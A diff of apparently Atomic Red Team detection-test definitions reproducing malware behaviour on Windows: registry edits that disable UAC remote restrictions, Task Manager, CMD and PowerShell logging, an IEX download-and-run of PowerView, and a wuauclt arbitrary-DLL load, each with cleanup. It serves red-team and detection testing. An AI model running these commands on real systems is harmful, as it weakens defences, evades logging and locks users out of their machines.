       cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
       cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
     cleanup_command: |
-      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
-      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
-      reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
+      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
+      reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: BlackByte Ransomware Registry Changes - Powershell
+  auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
+  description: |
+    This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+    The steps are as follows:
+    <ol>
+        <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+        <li>2. Enable OS to share network connections between different privilege levels</li>
+        <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+    </ol>
+    The registry keys and their respective values will be created upon successful execution.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+      New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+    cleanup_command: |
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+- name: Disable Windows Registry Tool
+  auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
+    See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows CMD application
+  auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
+    See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1
+    cleanup_command: |
+      Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+- name: Disable Windows Task Manager application
+  auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
+    See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Notification Center
+  auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
+    See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Shutdown Button
+  auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
+    See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows LogOff Button 
+  auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
+    See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Change Password Feature
+  auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
+    See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Disable Windows Lock Workstation Feature
+  auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
+    See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoDesktop Group Policy Feature
+  auto_generated_guid: 93386d41-525c-4a1b-8235-134a628dee17
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoRun Group Policy Feature
+  auto_generated_guid: d49ff3cc-8168-4123-b5b3-f057d9abbd55
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /f 
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoFind Group Policy Feature
+  auto_generated_guid: ffbb407e-7f1d-4c95-b22e-548169db1fbd
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoControlPanel Group Policy Feature
+  auto_generated_guid: a450e469-ba54-4de1-9deb-9023a6111690
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoFileMenu Group Policy Feature
+  auto_generated_guid: 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true  
+- name: Activate Windows NoClose Group Policy Feature
+  auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true 
+- name: Activate Windows NoSetTaskbar Group Policy Feature
+  auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoTrayContextMenu Group Policy Feature
+  auto_generated_guid: 4d72d4b1-fa7b-4374-b423-0fe326da49d2
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoPropertiesMyDocuments Group Policy Feature
+  auto_generated_guid: 20fc9daa-bd48-4325-9aff-81b967a84b1d
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Hide Windows Clock Group Policy Feature
+  auto_generated_guid: 8023db1e-ad06-4966-934b-b6a0ae52689e
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows HideSCAHealth Group Policy Feature
+  auto_generated_guid: a4637291-40b1-4a96-8c82-b28f1d73e54e
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows HideSCANetwork Group Policy Feature
+  auto_generated_guid: 3e757ce7-eca0-411a-9583-1c33b8508d52
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows HideSCAPower Group Policy Feature
+  auto_generated_guid: 8d85a5d8-702f-436f-bc78-fcd9119496fc
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows HideSCAVolume Group Policy Feature
+  auto_generated_guid: 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect..
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows Modify Show Compress Color And Info Tip Registry
+  auto_generated_guid: 795d3248-0394-4d4d-8e86-4e8df2a2693f
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. 
+    See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
+      reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
+      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows Powershell Logging Disabled
+  auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
+    see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
+      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
+      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
+      reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
+      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
+      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
+      reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
     name: command_prompt
     elevation_required: true
-    

atomics/T1113/T1113.md

@@ -186,7 +186,7 @@ if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```bash
-sudo apt-get -y install graphicsmagick-imagemagick-compat
+sudo apt install graphicsmagick-imagemagick-compat
 ```
 
 

atomics/T1113/T1113.yaml

@@ -86,7 +86,7 @@ atomic_tests:
     prereq_command: |
       if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
     get_prereq_command: |
-      sudo apt-get -y install graphicsmagick-imagemagick-compat
+      sudo apt install graphicsmagick-imagemagick-compat
   executor:
     command: |
       import -window root #{output_file}

atomics/T1201/T1201.md

@@ -20,6 +20,10 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems
 
 - [Atomic Test #7 - Examine password policy - macOS](#atomic-test-7---examine-password-policy---macos)
 
+- [Atomic Test #8 - Get-DomainPolicy with PowerView](#atomic-test-8---get-domainpolicy-with-powerview)
+
+- [Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy](#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy)
+
 
 <br/>
 
@@ -241,4 +245,63 @@ pwpolicy getaccountpolicies
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Get-DomainPolicy with PowerView
+Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+Upon successful execution a listing of the policy implemented will display.
+Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b2698b33-984c-4a1c-93bb-e4ba72a0babb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-addefaultdomainpasswordpolicy
+```
+
+
+
+
+
+
 <br/>

atomics/T1201/T1201.yaml

@@ -85,4 +85,27 @@ atomic_tests:
   executor:
     command: pwpolicy getaccountpolicies
     name: bash
-
+- name: Get-DomainPolicy with PowerView
+  auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+  description: |
+    Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+    name: powershell
+- name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+  auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
+  description: |
+    The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+    Upon successful execution a listing of the policy implemented will display.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      get-addefaultdomainpasswordpolicy

atomics/T1218/T1218.md

@@ -22,6 +22,8 @@
 
 - [Atomic Test #9 - DiskShadow Command Execution](#atomic-test-9---diskshadow-command-execution)
 
+- [Atomic Test #10 - Load Arbitrary DLL via Wuauclt (Windows Update Client)](#atomic-test-10---load-arbitrary-dll-via-wuauclt-windows-update-client)
+
 
 <br/>
 
@@ -450,4 +452,55 @@ echo "DiskShadow.exe not found on disk at expected location"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #10 - Load Arbitrary DLL via Wuauclt (Windows Update Client)
+This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. 
+See https://dtm.uk/wuauclt/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 49fbd548-49e9-4bb7-94a6-3769613912b8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| arbitrary_dll | Path of DLL to be loaded | String | PathToAtomicsFolder&#92;T1218&#92;bin&#92;calc.dll|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer
+```
+
+#### Cleanup Commands:
+```cmd
+taskkill /f /im calculator.exe > nul 2>&1
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: DLL to load must exist on disk as specified location (#{arbitrary_dll})
+##### Check Prereq Commands:
+```powershell
+if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
+```
+
+
+
+
 <br/>

atomics/T1218/T1218.yaml

@@ -255,4 +255,31 @@ atomic_tests:
     command: |
       #{dspath} -S #{txt_payload} 
     name: powershell
-    elevation_required: false
+    elevation_required: false
+- name: Load Arbitrary DLL via Wuauclt (Windows Update Client)
+  auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8
+  description: |
+    This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. 
+    See https://dtm.uk/wuauclt/
+  supported_platforms:
+  - windows
+  input_arguments:
+    arbitrary_dll:
+      description: Path of DLL to be loaded
+      type: String
+      default: PathToAtomicsFolder\T1218\bin\calc.dll
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      DLL to load must exist on disk as specified location (#{arbitrary_dll})
+    prereq_command: |
+      if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
+    get_prereq_command: |
